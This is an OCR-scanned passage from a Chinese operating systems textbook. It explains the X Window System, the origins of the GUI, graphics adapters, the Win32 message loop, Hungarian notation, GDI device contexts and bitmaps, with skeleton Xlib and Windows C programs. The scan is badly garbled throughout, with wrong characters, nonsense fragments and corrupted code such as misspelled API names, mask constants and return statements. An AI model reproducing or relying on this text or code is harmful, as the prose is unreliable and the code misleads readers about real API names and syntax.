度 灵 活 。 它 已 经 被 移植 到 UNIX 的 大 多 数 版 本 上 ， 包 括 Solaris、BSD 的 
所 有 派生 版 本 、AIX、Linux 等 ， 这 就 使 得 对 于 应 用 程序 开发 人 员 来 说 


在 多 种 平台 上 拥有 标准 的 用 户 界面 成 为 可 能 。 它 还 被 移植 到 其 他 操作 
系统 上 。 相 反 ， 在 Windows 中 ， 窗 口 与 GUI 系 统 在 GDI 中 混合 在 一 起 并 
且 处 于 内 核 之 中 ， 这 使 得 它们 维护 起 来 十 分 困难 ， 并 且 当 然 是 不 可 移 
植 的 。 


现在 让 我 们 像 症 从 Xlib 层 观察 那样 来 简略 地 看 一 看 X。 当 一 个 X 程 
序 局 动 时 ， 它 打开 一 个 到 一 个 或 多 个 X 服 务 器 〈 我 们 称 它们 为 工作 站 ) 
的 连接 ， 即 使 它们 可 能 与 xX 程序 在 同一 台 机 器 上 。 在 消息 丢失 与 重复 由 
网 络 软件 来 处 理 的 意义 上 ，X 认 为 这 一 连接 是 可 靠 的 ， 并 且 它 不 用 担心 
通信 错误。 通 前 在 服务 占 与 客户 之 间 使 用 的 是 TCP/IP。 


四 种 类 型 的 消 妃 通过 连接 传 ; 


Pik 


D 从 程序 到 工作 站 的 绘图 命令 


2) 工 作 站 对 程序 请 求 的 应 答 。 
3) 键 盘 、 鼠 标 以 及 其 他 事件 的 通告 。 
APRIRE ° 


从 程序 到 工作 站 的 大 多 数 绘图 命令 是 作为 单 问 消息 发 送 的 ， 不 期 
望 应 管 。 这 样 设计 的 原因 是 当 客 户 与 服务 右 进 程 在 不 同 的 机 右上 时 ， 
令 到 达 服 务 器 并 且 执 行 要 花费 相当 长 的 时 间 周 期 。 在 这 一 时 间 内 阻 


> 


塞 应 用 程序 将 不 必要 地 降低 其 执行 速度 。 男 一 方面 ， 当 程序 需要 来 自 
工作 站 的 信息 时 ， 它 只 好 等 得 直人 到 应 答 返 回 。 


与 Windows 类 似 ，X 是 融 度 事件 驱动 的 。 事 件 从 工作 站 流向 程序 ， 
通 肖 是 为 啊 应 人 的 某 些 行动 ， 例 如 键盘 融 击 、 鼠 标 移动 或 者 一 个 窗口 
家 显现 。 每 个 事件 消 思 32 个 字 世 ， 第 一 个 字 节 给 出 事件 类 型 ， 下 面 的 
31 个 字 世 提供 附加 的 信息 。 存 在 许多 种 类 的 事件 ， 但 站 发送 给 一 个 程 
序 的 只 有 那些 它 宣称 愿意 处 理 的 事件 。 例 如 ， 如 果 一 个 程序 不 想 得 知 
键 释 放 的 消 电 ， 那 么 键 释放 的 任何 事件 都 不 会 发 送 给 它 。 与 在 Windows 
中 一 样 ， 事 件 是 排 成 队列 的 ， 程 序 从 队列 中 读 取 事件 。 然 而 ， 与 
Windows 不 同 的 是 ， 操 作 系统 绝对 不 会 主动 调用 在 应 用 程序 之 内 的 过 
程 ， 它 甚至 不 知道 哪个 过 程 处 理 哪个 事件 。 


X 中 的 一 个 关键 概念 是 资源 (resource) 。 资 源 是 一 个 保存 一 定 信 
居 的 数据 结构 。 应 用 程序 在 工作 站 上 创建 资源 。 在 工作 站 上 ， 资 源 可 
以 在 多 个 进程 之 间 共 至 。 资 源 的 存活 期 往往 很 短 ， 并 且 当 工作 站 重新 
局 动 后 资源 不 会 继续 存在 。 典 型 的 资源 包括 窗口 、 字 体 、 颜 色 了 映射 
HEDO ` BREI (ME) 、 光 标 以 及 图 形 上 下 文 。 图 形 上 下 文 
用 于 将 属性 与 窗口 关联 起 来 ， 在 概念 上 与 Windows 的 设备 上 下 文 相 类 
似 。 


X 程 序 的 一 个 粗略 的 、 不 完全 的 框架 如 图 5-38 所 示 。 它 以 包含 某 些 
必需 的 头 文件 开始 ， 之 后 声明 某 些 变量 。 然 后 ， 它 与 X 服 务 器 和 连接， 又 


服务 器 是 作为 XOpenDisplay 的 参数 设 定 的 。 接 着 ， 它 分 配 一 个 窗口 资 
源 并 且 将 指向 该 窗口 资源 的 句柄 存放 在 win 中 。 实 际 上 ， 一 些 初始 化 应 
该 出 现在 这 里 ， 在 初始 化 之 后 X 程 序 通 知 窗 口 管 理 器 新 窗口 的 存在 ， 因 
而 窗口 管理 器 能 够 管理 它 。 


#include <X11/Xlib.h> 
#include <X11/Xutil.h> 


main(int argc, char *argv[]) 
{ 
Display disp; /* 服务 器 标识 符 */ 
eo /* 图 形 上 下 文 标识 符 */ 
$ EE ht Ar HHIH k 
int running ='1: 人 # 用 于 存储 一 个 事件 */ 


disp = XOpenDisplay("display_name"); /* 连接 到 X 服 务 器 

win = XCreateSimpleWindow(disp，..…. ); /* 为 新 留 口 分 配 内 存 */ 
XSetStandardProperties(disp, ...); /* 问 窗 口 管 理 器 宣布 窗口 */ 

gc = XCreateGC(disp, win, 0, 0); /* 创建 图 形 上 下 文 */ 
XSelectinput(disp, win, uionPrensMesk | KeyPressMask | ExposureMask); 
XMapRaised(disp, win); /* 显示 窗口 ， 发 送 Expose 事 件 */ 


while (running) { 
XNextEvent(disp, &event);  /* 获得 下 一 个 事件 */ 
switch (event.type) { ese r 
case Expose: wat break; | /* 12s ta a Y 
case ButtonPress: ...; break;  /* ABE itty aati */ 
case Keypress: …; break; /处 理 键 盘 输 入 */ 


} 


XFreeGC(disp, gc); nen ibe wipro he ath 
XDestroyWindow(disp, win); /* 回收 窗口 的 内 存 空间 */ 
XCloseDisplay(disp); /* 拆卸 网 络 连接 */ 


Al 5-38 义 窗 口 应 用 程序 的 框架 


对 XCreateGC 的 调用 创建 一 个 图 形 上 下 文 ， 窗 口 的 属性 就 存放 在 图 
形 上 下 文中 。 在 一 个 更 加 复杂 的 程序 中 ， 窗 口 的 属性 应 该 在 这 里 被 初 
化 。 下 一 条 语句 对 XSelectInput 的 调用 通知 X 服 务 器 程序 准备 处 理 哪 
些 事件 ， 在 本 例 中 ， 程 序 对 鼠标 点 击 、 键 副 敲 击 以 及 窗口 被 显现 感 兴 
趣 。 实 际 上 ， 一 个 真正 的 程序 还 会 对 其 他 事件 感 兴趣 。 最 后 ， 对 
XMapRaised 的 调用 将 新 窗口 作为 最 顶层 的 窗口 映射 到 屏幕 上 。 此 时 ， 
窗口 在 屏幕 上 成 为 可 见 的 。 


主 循环 由 两 条 语句 构成 ， 并 且 在 逻辑 上 比 Windows 中 对 应 的 循环 要 
简单 得 多 。 此 处 ， 第 一 条 语句 获得 一 个 事件 ， 第 二 条 语句 对 事件 类 型 
进行 分 派 从 而 进行 处 理 。 当 某 个 事件 表明 程序 已 经 结束 的 时 候 ， 
running 被 设置 为 0， 循 环 结束 。 在 退出 之 前 ， 程 序 释 放 了 图 形 上 下 文 、 
窗口 和 连接 。 


值得 一 提 的 是 ， 并 非 每 个 人 都 喜欢 GUI。 许 多 程序 员 更 喜欢 上 面 
5.6.2 玫 讨论 的 那 种 传统 的 面 癌 命令 行 的 界面 。X 通 过 一 个 称 为 xterm 的 
客户 程序 解决 了 这 一 问题 。 该 程序 仿真 了 一 人 台 古 老 的 VT102 智 能 终端 ， 
完全 具有 所 有 的 转 义 序列 。 因 此 ， 编 辑 器 (例如 vi 和 emacs) 以 及 其 他 
使 用 termcap 的 软件 无 需 修改 就 可 以 在 这 些 窗口 中 工作 。 


3. 图 形 用 户 界面 


大 多 数 个 人 计算 机 提供 了 GUI (Graphical User Interface, KIÉ H 
界面 ) 。 首 字母 缩写 词 GUI 的 发 音 是 “gooey”。 


GUI 是 由 斯 坦 福 研究 院 的 Douglas Engelbart 和 他 的 研究 小 组 发 明 
的 。 之 后 GUI 被 Xerox PARC 的 研究 人 员 擎 仿 。 在 一 个 风 和 日 丽 的 日 
子 ，Apple 公 司 的 共同 创立 者 Steve Jobs 参 观 了 PARC， 并 且 在 一 台 Xerox 
计算 机 上 见 到 了 GUI 。 这 使 他 产生 了 开发 一 种 新 型 计算 机 的 想法 ， 这 种 
新 型 计算 机 就 是 Apple Lisa。Lisa 因 为 太 过 昂贵 因而 在 商业 上 是 失败 
的 ， 但 是 它 的 后 继 者 Macintosh 获 得 了 巨大 的 成 功 。 


当 Microsoft 得 到 Macintosh 的 原型 从 而 能 够 在 其 上 开发 Microsoft 
Office 时 ，Microsoft 请 求 Apple 发 放 界面 许可 给 所 有 新 来 者 ， 这 样 
Macintosh 就 能 够 成 为 新 的 业界 标准 。 (Microsoft 从 Office 获 得 了 比 MS- 
DOS 多 得 多 的 收入 ， 所 以 它 愿 意 放弃 MS-DOS 以 获得 更 好 的 平台 用 于 
Office。) Apple 负 责 Macintosh 的 主管 Jean-Louis Gassée 拒 绝 T Microsoft 
的 请 求 ， 并 且 Steve Jobs 已 经 离开 了 Apple 而 不 能 否决 他 。 最 终 ， 
Microsoft 得 到 了 界面 要 素 的 许可 证 ， 这 形成 了 Windows 的 基础 。 当 
Microsoft 开 始 退 上 Apple 时 ，Apple 提 起 了 对 Microsoft 的 诉讼 ， 声 称 
Microsoft 超 出 了 许可 证 的 界限 ， 但 是 法 官 并 不 认可 ， 并 且 Windows 继 续 
追赶 并 超过 了 Macintosh。 如 果 Gasske 同 意 Apple 内 部 许多 人 的 看 法 (他 
们 也 希望 将 Macintosh 软 件 许可 给 任何 人 ) ， 那 么 Apple 或 许 会 因为 许可 
费 而 变 得 无 限定 有， 并且 现在 就 不 会 存在 Windows 了。 


GUI 有 具有 用 字符 WIMP 表 示 的 四 个 基本 要 素 ， 这 些 字 母 分 别 代 表 窗 
O (Window) 、 图 标 (Icon) » 3%% (Menu) 和 定点 设备 (Pointing 
device) 。 窗 口 是 一 个 矩形 块 状 的 屏幕 区 域 ， 用 来 运行 程序 。 图 标 是 小 
符号 ， 可 以 在 其 上 后 击 导致 某 个 动作 发 生 。 菜 单 是 动作 列表 ， 人 们 可 
以 从 中 进行 选择 。 最 后 ， 定 点 设备 是 女 标 、 跟 踩 球 或 者 其 他 硬件 设 
备 ， 用 来 在 屏幕 上 移动 光标 以 便 选 择 项 目 。 


GUI 软件 可 以 在 用 户 级 代码 中 实现 (如 UNIX 系 统 所 做 的 那样 )， 
也 可 以 在 操作 系统 中 实现 (如 Windows 的 情况 ) 。 


GUI 系统 的 输入 仍然 使 用 键盘 和 鼠标 ， 但 是 输出 几乎 总 是 送 往 特 殊 
的 硬件 电路 板 ， 称 为 图 形 适 配器 (graphics adapter) 。 图 形 适 配器 包含 
特殊 的 内 存 ， 称 为 视频 RAM (video RAM) ， 它 保存 出 现在 屏幕 上 的 
图 像 。 高 端的 图 形 适 配器 通常 具有 强大 的 32 位 或 64 位 CPU 和 多 达 1GB 目 
己 的 RAM， 独 立 于 计算 机 的 主 存 。 


每 个 图 形 适 配 句 支持 几 种 屏幕 尺寸 。 和 常见 的 尺寸 是 1024x768、 
1280x960、1600x1200 和 1920x1200。 除 了 1920x1200 以 外 ， 所 有 这 些 尺 
寸 的 宽 高 比 都 是 4:3， 符 合 NTSC 和 PAL 电 视 机 的 屏幕 宽 高 比 ， 因 此 可 以 
在 用 于 电视 机 的 相同 的 监视 器 上 产生 正方 形 的 像素 。1920x1200 尺 寸 意 
在 用 于 视屏 监视 器 ， 它 的 宽 高 比 与 这 一 分 辨 率 相 匹配 。 在 最 高 的 分 辨 
率 下 ， 每 个 像素 具有 24 位 的 彩色 显示 ， 只 是 保存 图 像 就 需要 大 约 6.5MB 
的 RAM， 所 以 ， 拥 有 256MB 或 更 多 的 RAM， 图 形 适 配器 就 能 够 一 次 保 


存 许多 图 像 。 如 采 整 个 屏幕 每 秒 刷新 75 次 ， 那 么 视频 RAM 必 须 能 够 连 
续 地 以 每 秒 489MB 的 速率 发 送 数据 。 


GUI 的 输出 软件 是 一 个 巨大 的 主题 。 单 是 大 于 Windows GUWE F 
了 许多 1500 多 页 的 书 (例如 Petzold，1999; Simon, 1997; Rector 和 
Newcomer, 1997) 。 显 然 ， 在 这 一 小 闻 中 ， 我 们 只 可 能 浅 尝 其 表面 并 
且 介 绍 少许 基本 的 概念 。 为 了 使 讨论 具体 化 ， 我 们 将 描述 Win32 APT, 
它 被 Windows 的 所 有 32 位 版 本 所 文 特 。 在 一 般 意义 上 ， 其 他 GUI 的 输出 
ERIE AR EEH, (Ee AAA] o 


屏幕 上 的 基本 项 目 是 一 个 矩形 区 域 ， 称 为 窗口 (window) ° 窗口 
的 位 置 和 大 小 通过 给 定 两 个 斜 对 角 的 坐标 (以 像素 为 单位 ) 惟一 地 决 

定 。 窗 口 可 以 包含 一 个 标题 条 、 一 个 菜单 条 、 一 个 工具 条 、 一 个 垂直 
深 动 条 和 一 个 水 平 深 动 条 。 典 型 的 窗口 如 图 5-39 所 示 。 注 意 ，Windows 
的 坐标 系 将 原点 置 于 左上 角 并 且 y 向 下 增长 ， 这 不 同 于 数学 中 使 用 的 笛 
卡 儿 坐标 。 


(0, 0) (1023, 0) 


ai 100) —— 
ye MZ 1% 
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(0, 767) (1023, 767) 
图 5-39 XGA 显示 器 上 位 于 (200,100) 处 的 一 个 窗口 样 例 


当 窗 口 被 创建 时 ， 有 一 些 参数 可 以 设 定 窗口 是 否 可 以 被 用 户 移 
动 ， 是 否 可 以 被 用 户 调整 大 小 ， 或 者 是 否 可 以 被 用 户 滚动 (通过 拖 动 
滚动 条 上 的 拇指 ) 。 大 多 数 程序 产生 的 主 窗口 可 以 被 移动 、 调 整 大 小 
和 滚动 ， 这 对 于 Windows 程 序 的 编写 方式 具有 重大 的 意义 。 特 别 地 ， 程 
序 必须 被 告知 关于 其 窗口 大 小 的 改变 ， 并 且 必 须 准备 在 任何 时 刻 重 画 
其 窗口 的 内 容 ， 即 使 在 程序 最 不 期 望 的 时 候 。 
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Windows 所 捕获 ， 并 且 转 换 成 消息 ， 送 到 正在 被 访问 的 窗口 所 属于 的 程 
序 。 每 个 程序 都 有 一 个 消息 队列 ， 与 程序 的 所 有 窗口 相关 的 消息 都 被 
发 送 到 该 队列 中 。 程 序 的 主 循 环 包括 提取 下 一 条 消息 ， 并 且 通 过 调用 
针对 该 消息 类 型 的 内 部 过 程 对 其 进行 处 理 。 在 某 些 情况 下 ，Windows 本 
身 可 以 绕 过 消息 队列 而 直接 调用 这 些 过 程 。 这 一 模型 与 UNIX 的 过 程 化 
代码 模型 完全 不 同 ，UNIX 模 型 古 提 请 系统 调用 与 操作 系统 相互 作用 
的 。 然 而 ，X 古 面 同 事件 的 。 


为 了 使 这 一 编程 模型 更 加 清晰 ， 请 考虑 图 5-40 的 例子 。 在 这 里 我 们 
看 到 的 是 Windows 主 程序 的 框架 ， 它 并 不 完整 并 且 没 有 做 错误 检查 ， 但 
苹 对 于 我 们 的 意图 而 言 它 显示 了 足够 的 细 广 。 程 序 的 开头 包含 一 个 头 
文件 windows.h， 它 包 舍 许 多 安 、 效 据 类 型 、 各 数 、 男 数 原 型 ， 以 及 
Windows 程 序 所 需要 的 其 他 信息 。 


#include <windows.h> 


int WINAPI WinMain(HINSTANCE h, HINSTANCE, hprev, char *szCmd, int iCmdShow) 
{ 

WNDCLASS wndclass; /* 本 窗口 的 类 对 象 */ 

MSG msg; /* 进入 的 消息 存放 在 这 里 */ 

HWND hwnd; E OMAR GRE) */ 


/* 初 始 化 wndclass*/ Sy Pe 
wndclass.lpfnWndProc = WndProc; /* 指示 调用 哪个 过 程 */ 
wndclass.lpszClassName = "Program name"; /* 标题 条 的 文本 */ 
wndclass.hicon = Loadicon(NULL, IDI_APPLICATION); /* 装载 程序 图 标 */ 
wndclass.hCursor = LoadCursor(NULL, IDC_ARROW); pe 装载 鼠标 光标 */ 


RegisterClass(&wndclass); /* [A] Windows}# jl} wndclass */ 
hwnd = CreateWindow (... ) /* 为 窗口 分 配 存 fifi */ 
ShowWindow(hwnd, iCmdShow); /* 在 屏幕 上 显示 窗口 */ 
UpdateWindow(hwnd); /* 指示 窗口 绘制 自身 */ 


while (GetMessage(&msg, NULL, 0, 0)) {上访 从 队列 中 获取 消息 */ 
TranslateMessage(&msg); /* 转换 消息 */ 
DispatchMessage(&msg); /* msg Fee 4 ii “4 (Wit FE */ 


return(msg.wParam); 


} 
long CALLBACK WndProc(HWND hwnd, UINT message, UINT wParam, long |Param) 
/* 这 里 是 声明 * 


switch (message) { 
case WM_CREATE: “...; return ...; /* 创建 窗 O */ 
case WM_PAINT: ..…; retumn..; /* 重 绘 窗口 的 内 容 */ 
case WM_DESTROY: ...; retum...;  /* #4 on 窗口 */ 

} 


return(DefWindowProc(hwnd, message, wParam, IParam));/* 默认 */ 


图 5-40 ”Windows 主 程序 的 框架 


主 程序 以 一 个 声明 开始 ， 该 声明 给 出 了 它 的 名 字 和 参数 。WINAPI 
宏 是 一 条 给 编译 器 的 指令 ， 让 编译 器 使 用 一 定 的 参数 传递 约定 并 且 不 
需要 我 们 进一步 关心 。 第 一 个 参数 h 是 一 个 实例 句柄 ， 用 来 向 系统 的 其 
他 部 分 标识 程序 。 在 某 种 程度 上 ，Win32 是 面向 对 象 的 ， 这 意味 着 系统 


包含 对 象 【( 例 如 程序 、 文 件 和 窗口 。 对 象 具有 状态 和 相关 的 代码 ， 
而 相关 的 代码 称 为 方法 (method) ， 它 对 于 状态 进行 操作 。 对 象 是 使 
用 句柄 来 引用 的 ， 在 该 示例 中 ，pP 标 识 的 是 程序 。 第 二 个 参数 只 是 为 了 
加 后 兼容 才 出 现 的 ， 写 已 不 再 使 用 。 第 三 个 参数 szCmd 是 一 个 以 零 终 目 
的 字符 串 ， 包 含 局 动 该 程序 的 命令 行 ， 即 使 程序 不 是 从 命令 行 启动 

的 。 第 四 个 参数 iCmdShow 表 明 程 序 的 初始 窗口 应 该 占据 整个 屏幕 ， 占 
据 屏 幕 的 一 部 分 ， 还 是 一 点 也 不 占据 屏幕 (只 是 任务 条 ) 


该 声明 说 明了 一 个 广泛 采用 的 Microsoft 约 定 ， 称 为 匈牙利 记号 

(Hungarian notation) 。 该 名 称 是 一 个 涉及 波兰 记号 的 双关 语 ， 波 兰 记 
号 是 波兰 逻辑 学 家 J.Lukasiewicz 发 明 的 后 缀 系统 ， 用 于 不 使 用 优先 级 和 
括号 表示 代数 公式 。 匈 牙 利 记号 是 Microsoft 的 一 名 匈牙利 程序 员 
Charles Simonyi 发 明 的 ， 它 使 用 标识 符 的 前 几 个 字符 来 指定 类 型 。 人 允许 
的 字母 和 类 型 包括 c (character， 字 符 ) `w (word， 字 ， 现 在 意 指 无 符 
号 16 位 整数 ) 、i (integer，32 位 有 符号 整数 ) 、1 (long， 也 是 一 个 32 
位 有 符号 整数 ) `s (string， 字 符 串 ) 、sz (string terminated by a zero 
byte， 以 零 字 节 终 止 的 字符 串 ) `p (pointer， 指 针 ) >» fn (function, 
函数 ) 和 h (handle， 句 柄 ) 。 因 此 ， 举 例 来 说 ，szCmd 是 一 个 以 零 终 
止 的 字符 串 并 且 iCmdShow 是 一 个 整数 。 许 多 程序 员 认 为 在 变量 名 中 像 
这 样 对 类 型 进行 编码 没有 什么 价值 ， 并 且 使 Windows 代 码 异 常 地 难于 阅 
读 。 在 UNIX 中 就 没有 类 似 这 样 的 约定 。 


每 个 窗口 必须 具有 一 个 相关 联 的 类 对 象 定 义 其 属性 ， 在 图 5-40 中 ， 
类 对 象 是 wndclass。 对 象 类 型 WNDCLASS 具 有 10 个 字段 ， 其 中 4 个 字段 
在 图 5-40 中 被 初始 化 ， 在 一 个 以 实际 的 程序 中 ， 其 他 6 个 字段 也 要 被 初 
台 化 。 最 重要 的 字段 是 jpfnoWndProc， 它 是 一 个 指向 函数 的 长 〈 即 32 
位 ) 指针 ， 该 函数 处 理 引 向 该 窗口 的 消息 。 此 处 被 初始 化 的 其 他 字段 
指出 在 标题 条 中 使 用 哪个 名 字 和 图 标 ， 以 及 对 于 鼠标 光标 使 用 哪个 符 


mj 
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在 wndclass 被 初始 化 之 后 ，RegisterClass 被 调用 ， 将 其 发 送 给 
Windows。 特 别 地 ， 在 该 调用 之 后 Windows 束 会 知道 当 各 种 事件 发 生 时 
要 调用 哪个 过 程 。 下 一 个 调用 CreateWindow 为 窗口 的 数据 结构 分 配 内 
存 并 且 返 回 一 个 句柄 以 便 以 后 引用 它 。 然 后 ， 程 序 做 了 男 外 两 个 调 
用 ， 将 窗口 轮廓 置 于 屏幕 之 上 ， 并 且 最 终 完全 地 填充 窗口 。 


此 刻 我 们 到 达 了 程序 的 主 循环 ， 它 包括 获取 消息 ， 对 消息 做 一 定 
的 转换 ， 然 后 将 其 传 回 Windows 以 便 让 Windows 调 用 WndProc 来 处 理 
它 。 要 回答 这 一 完整 的 机 制 古 否 能 够 得 到 化 人 简 的 问题 ， 管 案 是 肯定 


的 ， 但 古 这 样 做 古 由 于 历史 的 缘故 ， 并 且 我 们 现在 坚持 这 样 做 。 


主 循环 之 后 是 过 程 WndProc， 它 处 理发 送 给 窗口 的 各 种 消息 。 此 处 
CALLBACK 的 使 用 与 上 面 的 WINAPI 相 类 似 ， 为 参数 指明 要 使 用 的 调 
用 序列 。 第 一 个 参数 是 要 使 用 的 窗口 的 句柄 。 第 二 个 参数 是 消息 类 
型 。 第 三 和 第 四 个 参数 可 以 用 来 在 需要 的 时 候 提供 附加 的 信息 。 


消息 类 型 WM_CREATE 和 WM_DESTROY 分 别 在 程序 的 开始 和 结 
束 时 发 送 。 它 们 给 程序 机 会 为 数据 结构 分 配 内 存 ， 并 且 将 其 返回 。 


第 三 个 消息 类 型 WM_PAINT 是 一 条 指令 ， 让 程序 填充 窗口 。 它 不 
仅 当 窗口 第 一 次 绘制 时 被 调用 ， 而 且 在 程序 执行 期 间 也 经 常 被 调用 。 
与 基于 文本 的 系统 相反 ， 在 Windows 中 程序 不 能 够 假定 它 在 屏幕 上 画 的 
东西 将 一 直 保 持 在 那里 直到 将 其 删除 。 其 他 窗口 可 能 会 被 拖拉 到 该 窗 
口 的 上 面 ， 染 单 可 能 会 在 窗口 上 被 拉 下 ， 对 话 框 和 工具 提示 可 能 会 覆 
盖 窗 口 的 某 一 部 分 ， 如 此 等 等 。 当 这 些 项 目 被 移 开 后 ， 窗 口 必须 重 
绘 。Windows 告 知 一 个 程序 重 绘 窗口 的 方法 是 发 送 WM_PAINT 消 息 。 
作为 一 种 友好 的 姿态 ， 它 还 会 提供 窗口 的 哪 一 部 分 曾经 被 覆盖 的 信 
妃 ， 这 样 程序 就 更 加 容易 重新 生成 窗口 的 那 一 部 分 而 不 必 重 绘 整个 窗 
Ce 


Windows 有 两 种 方法 可 以 让 一 个 程序 做 某 些 事情 。 一 种 方法 是 投递 
一 条 消息 到 其 消息 队列 。 这 种 方法 用 于 键盘 和 输入、 鼠标 输入 以 及 定时 
器 到 时 。 男 一 种 方法 是 发 送 一 条 消息 到 窗口 ， 从 而 使 Windows 直 接 调 用 
WndProc 本 喘 。 这 一 方法 用 于 所 有 其 他 事件 。 由 于 当 一 条 消 轧 完全 被 处 
理 后 Windows 会 得 到 通报 ， 这 样 Windows 束 能 够 避免 在 前 一 个 调用 完成 
前 产生 痢 的 调用 ， 由 此 可 以 避免 竞争 条 件 。 


还 有 许多 其 他 消 忆 类 型 。 当 一 个 不 期 望 的 消息 到 达 时 为 了 避免 异 
常 行为 ， 最 好 在 WndProc 的 结尾 处 调用 DefWindowProc， 让 默认 处理 过 


程 处 理 其 他 情形 。 


总 之 ，Windows 程 序 通 淀 创 建 一 个 或 多 个 窗口 ， 每 个 窗口 具有 一 个 
类 对 象 。 与 每 个 程序 相关 联 的 是 一 个 消息 队列 和 一 组 处 理 过 程 。 最 
终 ， 程 序 的 行为 由 到 来 的 事件 驱动 ， 这 些 事件 由 处 理 过 程 来 处 理 。 与 
UNIX 采 用 的 过 程 化 观点 相 比 ， 这 下 一 个 完全 不 同 的 世界 观 模型 。 


对 屏幕 的 实际 绘图 是 由 包含 儿 百 个 过 程 的 程序 包 人 处 理 的 ， 这 些 过 
程 捆 在 一 起 形成 了 GDI (Graphics Device Interface， 图 形 设备 接口 ) 。 
它 能 够 处 理 文本 和 各 种 类 型 的 图 形 ， 并 且 被 设计 成 与 平台 和 设备 无 基 
的 。 在 一 个 程序 可 以 在 窗口 中 绘图 〈 即 绘画 ) 之 前 ， 它 需要 获取 一 个 
设备 上 下 文 (device context) : 设备 上 下 文 是 一 个 内 部 数据 结构 ， 包 合 
窗口 的 属性 ， 诸 如 当前 字体 、 文 本 闫 色 、 背 景 颜色 等 。 大 多 数 GDI 调 用 
使 用 设备 上 下 文 ， 不管 是 为 了 绘图 ， 还 是 为 了 获取 或 设置 属性 。 


有 许 许 多 多 的 方法 可 用 来 获取 设备 上 下 文 。 下 面 是 一 个 获取 并 使 
用 设备 上 下 文 的 位 单 例子 : 
hdc=GetDC(hwnd) ; 


TextOut(hdc, x, y, psText, iLength); 
ReleaseDC(hwnd, hdc); 


第 一 条 语句 获取 一 个 设备 上 下 文 的 句柄 hdc。 第 二 条 语句 使 用 设备 
上 下 文 在 屏幕 上 写 一 行文 本 ， 该 语句 设 定 了 字符 串 开 始 处 的 (xy) AB 
标 、 一 个 指 癌 字符 串 本 身 的 指针 以 及 字符 串 的 长 度 。 第 三 个 调用 释放 


设备 上 下 文 ， 表 明 程 序 在 当时 已 通过 了 绘图 操作 。 注 意 ，hdc 的 使 用 方 
式 与 UNIX 的 文件 描述 符 相 类 似 。 还 需要 注意 的 是 ，ReleaseDC 包 含 隐 
余 的 信息 〈 使 用 hdc 就 可 以 惟一 地 指定 一 个 窗口 ) 。 使 用 不 具有 实际 价 
值 的 元 余 信 息 在 Windows 中 是 很 常见 的 。 


另 一 个 有 趣 的 注意 事项 是 ， 当 hdc 以 这 样 的 方式 被 获取 时 ， 程 序 只 
能 够 写 窗口 的 客户 区 ， 而 不 能 写 标 题 条 和 窗口 的 其 他 部 分 。 在 内 部 ， 
在 设备 上 下 文 的 数据 结构 中 ， 维 护 着 一 个 修剪 区 域 。 在 修剪 区 域 之 外 
的 任何 绘图 操作 都 将 被 名 上 略 。 然 而 ， 存 在 着 男 一 种 获取 设备 上 下 文 的 
方法 GetWindowDC， 它 将 修剪 区 域 设 置 为 整个 窗口 。 其 余 的 调用 以 其 
他 的 方法 限定 修 权 区域 。 拥 有 多 种 调用 做 几乎 相同 的 事情 是 Windows 的 


Fi ae? 


GDI 的 完全 论述 超出 了 这 里 讨论 的 范围 。 对 于 感 兴趣 的 读者 ， 上 面 
引用 的 参考 文献 提供 了 补充 的 信息 。 然 而 ， 关 于 GDI 可 能 还 值得 再 说 几 
句 话 ， 因 为 GDI 是 如 此 之 重要 。GDI 具 有 各 种 各 样 的 过 程 调 用 以 获取 和 
释放 设备 上 下 文 ， 获 取 关 于 设备 上 下 文 的 信息 ， 获 取 和 设置 设备 上 下 
文 的 属性 〈 例 如 背景 颜色 ) ， 使 用 GDI 对 象 (例如 画笔 、 画 刷 和 字体 ， 
其 中 每 个 对 象 都 有 自己 的 属性 ) 。 最 后 ， 当 然 存 在 许多 实际 在 屏幕 上 
绘图 的 GDI 调 用 。 


绘图 过 程 分 成 四 种 类 型 : 绘制 直线 和 曲线 、 绘 制 填充 区 域 、 管 理 
位 图 以 及 显示 文本 。 我 们 在 上 面 看 到 了 绘制 文本 的 例子 ， 所 以 让 我 们 


快速 地 看 看 其 他 类 型 之 一 。 调 用 


Rectangle(hdc, xleft, ytop, xright, ybottom); 


将 绘制 一 个 填充 的 矩形 ， 它 的 左上 角 和 右 下角 分 别 是 (xleft,ytop) 
和 (xright,ybottom) 。 例 如 


Rectangle(hdc,2,1,6,4); 
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备 上 下 文 。 其 他 的 GDI 调 用 在 形式 上 是 类 似 的 。 
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图 5-41 使 用 Rectangle 绘 制 窍 形 的 例 于 。 每 个 方 框 代表 一 个 像素 


4. 位 图 


GDI 过 程 是 矢量 图 形 学 的 实例 。 它 们 用 于 在 屏幕 上 放置 几何 图 形 和 
文本 。 它 们 能 够 十 分 容易 地 缩放 到 较 大 和 较 小 的 屏幕 〈 如 有 果 屏 幕 上 的 
像素 数 是 相同 的 ) 。 它 们 还 是 相对 设备 无 关 的 。 一 组 对 GDI 过 程 的 调用 
可 以 聚集 在 一 个 文件 中 ， 接 述 一 个 复 洒 的 图 画 。 这 样 的 文件 称 为 
Windows 元 文件 (metafile) ， 广 泛 地 用 于 从 一 个 Windows 程 序 到 另 一 个 
Windows 程 序 传送 图 画 。 这 样 的 文件 具有 扩展 名 .wmf ° 


许多 Windows 程 序 允许 用 户 复制 图 画 (或 一 部 分 ) 并 且 放 在 
Windows 的 和 剪 贴 板 上 ， 然 后 用 户 可 以 转 入 另 一 个 程序 并 且 粘 贴 剪 贴 板 的 
内 容 到 另 一 个 文档 中 。 做 这 件 事 的 一 种 方法 是 由 第 一 个 程序 将 图 画 表 
示 为 Windows 元 文件 并 且 将 其 以 .wmf 格 式 放 在 剪贴 板 上 “。 此 外 ， 还 有 其 
他 的 方法 做 这 件 事 。 


并 不 是 计算 机 处 理 的 所 有 图 像 都 能 够 使 用 矢量 图 形 学 来 生成 。 例 
如 ， 照 片 和 视频 就 不 使 用 矢量 图 形 学 。 反 之 ， 这 些 项 目 可 以 通过 在 图 
像 上 履 盖 一 层 网 格 扫描 输入 。 每 一 个 网 格 方块 的 平均 红 、 绿 、 蓝 取 值 
被 采样 并 且 保 存 为 一 个 像素 的 值 。 这 样 的 文件 称 为 位 图 (bitmap) 。 
Windows 中 有 大 量 的 工具 用 于 处 理 位 图 。 


位 图 的 男 一 个 用 途 是 用 于 文本 。 在 某 种 字体 中 表示 一 个 特殊 字符 
的 一 种 方法 是 将 其 表示 为 小 的 位 图 。 于 是 往 屏 幕 上 添加 文本 就 变 成 移 
动 位 图 的 事情 。 


使 用 位 图 的 一 种 一 般 方法 十 通过 调用 BitBlt 过 程 ， 该 过 程 调用 如 
F: 


BitBIt(dsthdc, dx, dy,wid,ht, srchdc, sx, sy,rasterop); 


